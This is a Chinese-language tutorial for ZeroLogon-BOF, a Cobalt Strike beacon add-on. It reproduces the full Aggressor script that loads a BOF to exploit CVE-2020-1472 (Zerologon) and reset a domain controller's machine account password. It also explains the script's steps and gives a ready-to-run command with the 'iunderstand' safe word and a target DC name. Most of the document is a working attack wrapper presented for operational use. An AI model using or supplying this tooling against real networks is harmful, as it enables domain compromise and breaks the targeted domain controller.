ZeroLogon-BOF 项目使用教程
ZeroLogon-BOF项目地址:https://gitcode.com/gh_mirrors/ze/ZeroLogon-BOF
1. 项目的目录结构及介绍
ZeroLogon-BOF 项目的目录结构如下:
ZeroLogon-BOF/
├── dist/
│ └── zerologon.cna
├── README.md
└── LICENSE
dist/
目录:包含项目的主要脚本文件zerologon.cna
。README.md
文件:项目的说明文档。LICENSE
文件:项目的许可证文件,采用 BSD-3-Clause 许可证。
2. 项目的启动文件介绍
项目的启动文件是 dist/zerologon.cna
。该文件是一个 Cobalt Strike Aggressor 脚本,用于利用 Zerologon 漏洞重置域控制器的机器账户密码。
文件内容概述
alias zerologon {
local('$bid $barch $fqdn $netbios $args $safew');
($bid, $safew, $fqdn) = @_;
$netbios = split("\\", $fqdn)[0];
$barch = barch($1);
$handle = openf(script_resource("zerologon_$barch.o"));
$data = readb($handle, -1);
closef($handle);
$args = bof_pack($1, "ZZZ", $fqdn, $netbios, $netbios, '$');
if ($safew ne "iunderstand") {
berror($1, "zerologon aborted. Type help zerologon and read first.");
return;
}
btask($1, "Reset $netbios\$ machine account via CVE-2020-1472");
beacon_inline_execute($1, $data, "go", $args);
}
beacon_command_register("zerologon", "Reset DC machine account password with CVE-2020-1472", "Synopsis: zerologon [safeword] [DC fqdn]\n\nReset the machine account password for a domain controller with the Zerologon exploit.\n\nThis exploit will break the functionality of this domain controller.\n\nDon't use in production.\n\nUse 'iunderstand' as the safe word parameter to acknowledge that you read this.");
功能说明
zerologon
别名:定义了一个别名,用于执行 Zerologon 漏洞利用。- 参数处理:处理输入的参数,包括安全词和域控制器的 FQDN。
- 安全检查:确保用户理解并同意使用该漏洞利用。
- 执行漏洞利用:调用
beacon_inline_execute
函数执行漏洞利用。
3. 项目的配置文件介绍
ZeroLogon-BOF 项目没有显式的配置文件,其配置主要通过脚本参数传递。在执行 zerologon
命令时,需要提供安全词和域控制器的 FQDN。
配置示例
zerologon iunderstand dc.example.com
iunderstand
:安全词,表示用户已阅读并理解使用该漏洞利用的风险。dc.example.com
:域控制器的 FQDN。
以上是 ZeroLogon-BOF 项目的使用教程,包括项目的目录结构、启动文件和配置文件的介绍。希望对您有所帮助。
ZeroLogon-BOF项目地址:https://gitcode.com/gh_mirrors/ze/ZeroLogon-BOF